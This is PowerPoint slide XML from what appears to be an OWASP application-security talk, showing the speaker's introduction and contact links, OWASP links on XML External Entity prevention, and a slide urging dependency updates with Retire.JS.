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91" r:id="rId10"/>
    <p:sldId id="292" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="293" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="294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5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6" r:id="rId37"/>
    <p:sldId id="288" r:id="rId38"/>
    <p:sldId id="290" r:id="rId39"/>
    <p:sldId id="259" r:id="rId40"/>
    <p:sldId id="26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7" d="100"/>
          <a:sy n="97" d="100"/>
        </p:scale>
        <p:origin x="105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cryptojones@owasp.org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community/vulnerabilities/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html" TargetMode="Externa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s://exampleapp.cryptojones.dev/userinfo/51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cryptojones@owasp.org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community/vulnerabilities/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html" TargetMode="External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s://exampleapp.cryptojones.dev/userinfo/51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71F39-8DC6-40F2-B88A-8080B3227C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8A2AA-8C12-4C37-9684-BB23147E05E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Aaron K. Clark</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0062DFD1-F5C2-44B3-A5EA-7AD326EF4173}" type="parTrans" cxnId="{2B3853D0-69CF-414E-94A1-B28C0D74E5F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9180F7BC-62F6-4F18-B5BF-D4EC90FED7F3}" type="sibTrans" cxnId="{2B3853D0-69CF-414E-94A1-B28C0D74E5F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E512EDC4-3809-4011-A475-CB5D9A5CD432}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Made the Handle in 1990s (Dial-up BBS Days)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE088E21-D14C-4181-91B3-4217B6863A5E}" type="parTrans" cxnId="{C22DE1B4-835A-43A3-BB39-0C03D715656C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E43EBB80-15DB-4707-8B7F-C1332F12B06F}" type="sibTrans" cxnId="{C22DE1B4-835A-43A3-BB39-0C03D715656C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B258D9C8-A021-4033-9EA7-52E4ECED8BE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Crypto == Cryptography</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B898556-4DAB-456E-831D-46FEAA9F58E0}" type="parTrans" cxnId="{12D221EF-B450-4F27-9842-D79EABF0202F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9575ACDD-9CAF-454B-B888-8998A308D00A}" type="sibTrans" cxnId="{12D221EF-B450-4F27-9842-D79EABF0202F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{884A166B-7694-44A3-BB9E-F0D72A3FDD27}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Jones == Indiana Jones (Don’t judge, I was a pre-teen)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4220277-9C84-458F-99D4-D34A2F27364F}" type="parTrans" cxnId="{CC332365-670E-433F-8CB3-F652032E4969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{537BDBFC-ACC1-4165-8DD1-5013437E7C69}" type="sibTrans" cxnId="{CC332365-670E-433F-8CB3-F652032E4969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{541A2F9E-A8C0-4522-B193-015B6215CD19}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Now a Graduate Student @ RIT &amp; WGU</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89D6418E-EDC8-4A3E-98D0-175ADAABA929}" type="parTrans" cxnId="{9EB7BF53-A84D-4C5D-87C5-8CD032F36C4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B135E991-4817-41A0-BF61-4698A7416C7B}" type="sibTrans" cxnId="{9EB7BF53-A84D-4C5D-87C5-8CD032F36C4E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EC1AADD-AFAB-4E87-AC90-995649E6CF1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cryptojones@owasp.org</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1F92257-24C7-478F-A315-549466AE2108}" type="parTrans" cxnId="{C76C3E57-748D-4C0D-9329-74E67BB58E75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5640FD3-2711-45BA-8084-76DAE8D878FC}" type="sibTrans" cxnId="{C76C3E57-748D-4C0D-9329-74E67BB58E75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B4871C1-03E5-43D0-8EC9-89179F8155D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>linkedin.com/in/aaronkclark</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBFE42CF-D91A-4806-8AD6-AE68D4A1C89B}" type="parTrans" cxnId="{DBED3D08-F1CA-4AE9-BDE5-2B34270DEAAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{888E626A-30E8-4E4A-8361-21608DE95652}" type="sibTrans" cxnId="{DBED3D08-F1CA-4AE9-BDE5-2B34270DEAAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6687684-FF4F-43DC-AAB0-9FB03CE6CE7A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>twitter.com/aaronkclark</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39CEECC1-5B09-425E-B8F8-6B6112B32917}" type="parTrans" cxnId="{E499F8D5-0004-4991-B7F9-845BAF7CE179}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB81D47C-6C43-486F-B63B-D1CB989D8ED8}" type="sibTrans" cxnId="{E499F8D5-0004-4991-B7F9-845BAF7CE179}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90AFBC4B-E734-4D1F-87B2-0D018F9B1433}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>github.com/CryptoJones (&lt;- Slide Deck Here)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B014D529-2BB8-4528-A701-8199266FDF71}" type="parTrans" cxnId="{09F424E7-E968-4C98-83C9-F19864972A76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48B13DE2-E58D-4347-B98E-8160A46490B3}" type="sibTrans" cxnId="{09F424E7-E968-4C98-83C9-F19864972A76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" type="pres">
      <dgm:prSet presAssocID="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D8C829E-54D4-4F0F-A565-E025CFA72C52}" type="pres">
      <dgm:prSet presAssocID="{A438A2AA-8C12-4C37-9684-BB23147E05E6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0A22CEED-1B06-4718-8C62-BA96CB16ACD5}" type="pres">
      <dgm:prSet presAssocID="{9180F7BC-62F6-4F18-B5BF-D4EC90FED7F3}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BDACCC1-C286-48D0-B022-C2CC6F237E2C}" type="pres">
      <dgm:prSet presAssocID="{E512EDC4-3809-4011-A475-CB5D9A5CD43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11989CA-9237-4DF9-8B7D-450B9C420EB1}" type="pres">
      <dgm:prSet presAssocID="{E43EBB80-15DB-4707-8B7F-C1332F12B06F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2B9B41C-1792-48BA-A8E7-6E3B8B1DB65B}" type="pres">
      <dgm:prSet presAssocID="{B258D9C8-A021-4033-9EA7-52E4ECED8BE3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EBB67A9-3E7E-4D4F-9662-E30C172959C7}" type="pres">
      <dgm:prSet presAssocID="{9575ACDD-9CAF-454B-B888-8998A308D00A}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16314E31-17AE-4656-853C-44E913A31246}" type="pres">
      <dgm:prSet presAssocID="{884A166B-7694-44A3-BB9E-F0D72A3FDD27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F0AA623-CFA9-4E94-A05A-ACC023A14E00}" type="pres">
      <dgm:prSet presAssocID="{537BDBFC-ACC1-4165-8DD1-5013437E7C69}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D496B87-80B3-4087-B056-4202840F8306}" type="pres">
      <dgm:prSet presAssocID="{541A2F9E-A8C0-4522-B193-015B6215CD19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FC63C51B-15ED-4D6C-98CB-FE3DF566B085}" type="pres">
      <dgm:prSet presAssocID="{B135E991-4817-41A0-BF61-4698A7416C7B}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{640148DE-28A9-440D-BB30-757029A6B968}" type="pres">
      <dgm:prSet presAssocID="{0EC1AADD-AFAB-4E87-AC90-995649E6CF1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B30D104-9523-4DC1-A729-4C2574BBAA9A}" type="pres">
      <dgm:prSet presAssocID="{F5640FD3-2711-45BA-8084-76DAE8D878FC}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED65AB4D-BF84-49AE-B20A-61C312E93487}" type="pres">
      <dgm:prSet presAssocID="{8B4871C1-03E5-43D0-8EC9-89179F8155D1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8AFB6338-7591-4E57-B087-B1A8376327DA}" type="pres">
      <dgm:prSet presAssocID="{888E626A-30E8-4E4A-8361-21608DE95652}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1F409D2-624E-448C-8D64-B09E8214021E}" type="pres">
      <dgm:prSet presAssocID="{F6687684-FF4F-43DC-AAB0-9FB03CE6CE7A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CCEB740-A0E6-4B3A-A602-677B7C8E8F4C}" type="pres">
      <dgm:prSet presAssocID="{BB81D47C-6C43-486F-B63B-D1CB989D8ED8}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC2EC0F8-4075-40C6-AB0E-F0A40ECE53B9}" type="pres">
      <dgm:prSet presAssocID="{90AFBC4B-E734-4D1F-87B2-0D018F9B143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BED3D08-F1CA-4AE9-BDE5-2B34270DEAAB}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{8B4871C1-03E5-43D0-8EC9-89179F8155D1}" srcOrd="6" destOrd="0" parTransId="{BBFE42CF-D91A-4806-8AD6-AE68D4A1C89B}" sibTransId="{888E626A-30E8-4E4A-8361-21608DE95652}"/>
    <dgm:cxn modelId="{503F4F37-8661-4ECE-84EC-88618E4D2616}" type="presOf" srcId="{8B4871C1-03E5-43D0-8EC9-89179F8155D1}" destId="{ED65AB4D-BF84-49AE-B20A-61C312E93487}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DA61783C-DDD7-467F-BFB3-E055BB9CA127}" type="presOf" srcId="{541A2F9E-A8C0-4522-B193-015B6215CD19}" destId="{7D496B87-80B3-4087-B056-4202840F8306}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{CC332365-670E-433F-8CB3-F652032E4969}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{884A166B-7694-44A3-BB9E-F0D72A3FDD27}" srcOrd="3" destOrd="0" parTransId="{B4220277-9C84-458F-99D4-D34A2F27364F}" sibTransId="{537BDBFC-ACC1-4165-8DD1-5013437E7C69}"/>
    <dgm:cxn modelId="{9EB7BF53-A84D-4C5D-87C5-8CD032F36C4E}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{541A2F9E-A8C0-4522-B193-015B6215CD19}" srcOrd="4" destOrd="0" parTransId="{89D6418E-EDC8-4A3E-98D0-175ADAABA929}" sibTransId="{B135E991-4817-41A0-BF61-4698A7416C7B}"/>
    <dgm:cxn modelId="{C76C3E57-748D-4C0D-9329-74E67BB58E75}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{0EC1AADD-AFAB-4E87-AC90-995649E6CF1E}" srcOrd="5" destOrd="0" parTransId="{D1F92257-24C7-478F-A315-549466AE2108}" sibTransId="{F5640FD3-2711-45BA-8084-76DAE8D878FC}"/>
    <dgm:cxn modelId="{DFBF0F83-F1FE-42EA-B9BD-B6DA23FA8A11}" type="presOf" srcId="{0EC1AADD-AFAB-4E87-AC90-995649E6CF1E}" destId="{640148DE-28A9-440D-BB30-757029A6B968}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9B68558B-6222-4784-89D5-17011B86BCF3}" type="presOf" srcId="{884A166B-7694-44A3-BB9E-F0D72A3FDD27}" destId="{16314E31-17AE-4656-853C-44E913A31246}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8AEF939A-E7E9-4CBD-BA29-0367C6E11EE4}" type="presOf" srcId="{A438A2AA-8C12-4C37-9684-BB23147E05E6}" destId="{3D8C829E-54D4-4F0F-A565-E025CFA72C52}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C22DE1B4-835A-43A3-BB39-0C03D715656C}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{E512EDC4-3809-4011-A475-CB5D9A5CD432}" srcOrd="1" destOrd="0" parTransId="{DE088E21-D14C-4181-91B3-4217B6863A5E}" sibTransId="{E43EBB80-15DB-4707-8B7F-C1332F12B06F}"/>
    <dgm:cxn modelId="{A50293C6-A287-47C8-957F-44BC5097CE61}" type="presOf" srcId="{90AFBC4B-E734-4D1F-87B2-0D018F9B1433}" destId="{EC2EC0F8-4075-40C6-AB0E-F0A40ECE53B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2B3853D0-69CF-414E-94A1-B28C0D74E5F4}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{A438A2AA-8C12-4C37-9684-BB23147E05E6}" srcOrd="0" destOrd="0" parTransId="{0062DFD1-F5C2-44B3-A5EA-7AD326EF4173}" sibTransId="{9180F7BC-62F6-4F18-B5BF-D4EC90FED7F3}"/>
    <dgm:cxn modelId="{BBB221D3-B5E4-4ADF-A0F1-03BF9E2C5BBE}" type="presOf" srcId="{F6687684-FF4F-43DC-AAB0-9FB03CE6CE7A}" destId="{C1F409D2-624E-448C-8D64-B09E8214021E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E499F8D5-0004-4991-B7F9-845BAF7CE179}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{F6687684-FF4F-43DC-AAB0-9FB03CE6CE7A}" srcOrd="7" destOrd="0" parTransId="{39CEECC1-5B09-425E-B8F8-6B6112B32917}" sibTransId="{BB81D47C-6C43-486F-B63B-D1CB989D8ED8}"/>
    <dgm:cxn modelId="{C330BDDE-58CB-4966-B021-33BCD92EF2D7}" type="presOf" srcId="{E512EDC4-3809-4011-A475-CB5D9A5CD432}" destId="{6BDACCC1-C286-48D0-B022-C2CC6F237E2C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{09F424E7-E968-4C98-83C9-F19864972A76}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{90AFBC4B-E734-4D1F-87B2-0D018F9B1433}" srcOrd="8" destOrd="0" parTransId="{B014D529-2BB8-4528-A701-8199266FDF71}" sibTransId="{48B13DE2-E58D-4347-B98E-8160A46490B3}"/>
    <dgm:cxn modelId="{1DAF98E7-3904-44A6-B369-45CA7AAF9F2F}" type="presOf" srcId="{B258D9C8-A021-4033-9EA7-52E4ECED8BE3}" destId="{A2B9B41C-1792-48BA-A8E7-6E3B8B1DB65B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D09D0DEE-6588-4E49-AC0A-FCCBC8F2EC66}" type="presOf" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{12D221EF-B450-4F27-9842-D79EABF0202F}" srcId="{FC671F39-8DC6-40F2-B88A-8080B3227CA1}" destId="{B258D9C8-A021-4033-9EA7-52E4ECED8BE3}" srcOrd="2" destOrd="0" parTransId="{0B898556-4DAB-456E-831D-46FEAA9F58E0}" sibTransId="{9575ACDD-9CAF-454B-B888-8998A308D00A}"/>
    <dgm:cxn modelId="{3E4D70CD-F668-4C4E-8416-A8C7DE383131}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{3D8C829E-54D4-4F0F-A565-E025CFA72C52}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A3CA415B-F046-4171-BE0B-5BED8E1AB8F4}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{0A22CEED-1B06-4718-8C62-BA96CB16ACD5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FC284ED2-B2D5-470F-B781-E02442ED7790}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{6BDACCC1-C286-48D0-B022-C2CC6F237E2C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AF6EFB2A-6F48-4A5E-AE26-AAD13F8417C1}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{611989CA-9237-4DF9-8B7D-450B9C420EB1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AEA4F3E4-9CAF-4D6E-90BB-FF260344C2AC}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{A2B9B41C-1792-48BA-A8E7-6E3B8B1DB65B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B40DBEC1-CE20-4E20-A070-CD3FB48851DA}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{9EBB67A9-3E7E-4D4F-9662-E30C172959C7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{38BE32D7-8A67-4E8A-AE50-09CEA39D25FB}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{16314E31-17AE-4656-853C-44E913A31246}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{672F9EF4-E461-4480-9807-3F47BC6435DE}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{2F0AA623-CFA9-4E94-A05A-ACC023A14E00}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{68BFC67C-3A2A-4EF2-8B52-C016CE53A1BF}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{7D496B87-80B3-4087-B056-4202840F8306}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A27A8865-67BB-4B6A-840F-30D700D1584D}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{FC63C51B-15ED-4D6C-98CB-FE3DF566B085}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B3944688-BD76-425F-9466-0DDF42A41DB3}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{640148DE-28A9-440D-BB30-757029A6B968}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1B87693D-3E79-4E03-A2BF-547E29C7E15E}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{6B30D104-9523-4DC1-A729-4C2574BBAA9A}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{440092D4-FA74-4D17-AFFD-6630F226668A}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{ED65AB4D-BF84-49AE-B20A-61C312E93487}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{605D7A45-44C7-4482-8D91-CB17F2990EA5}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{8AFB6338-7591-4E57-B087-B1A8376327DA}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EA5CC729-7DBE-4ECE-ACBA-A9A03082C788}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{C1F409D2-624E-448C-8D64-B09E8214021E}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A0654704-0E64-4D7F-9008-6E4E83F0EB42}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{3CCEB740-A0E6-4B3A-A602-677B7C8E8F4C}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6A7571E0-F739-4FAF-83C4-FFD10A1066A1}" type="presParOf" srcId="{A310D97A-2ED4-448F-BC58-707D6F7A001F}" destId="{EC2EC0F8-4075-40C6-AB0E-F0A40ECE53B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DEC4FB-3CB6-41DD-B2CF-620CC439B12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F4EC52-4C83-4490-A73A-4B5D6125FB86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Update your f***</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>ing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> dependencies</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0710625D-27C5-476D-8B9C-DB9DDEAD05A7}" type="parTrans" cxnId="{8F30A849-7398-4E7F-8354-5AD3E072F5CD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1311C188-A4AA-47E4-803B-1A6B450AB241}" type="sibTrans" cxnId="{8F30A849-7398-4E7F-8354-5AD3E072F5CD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4137AA30-0D09-4630-B780-89001DDB2D82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Retire.JS</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
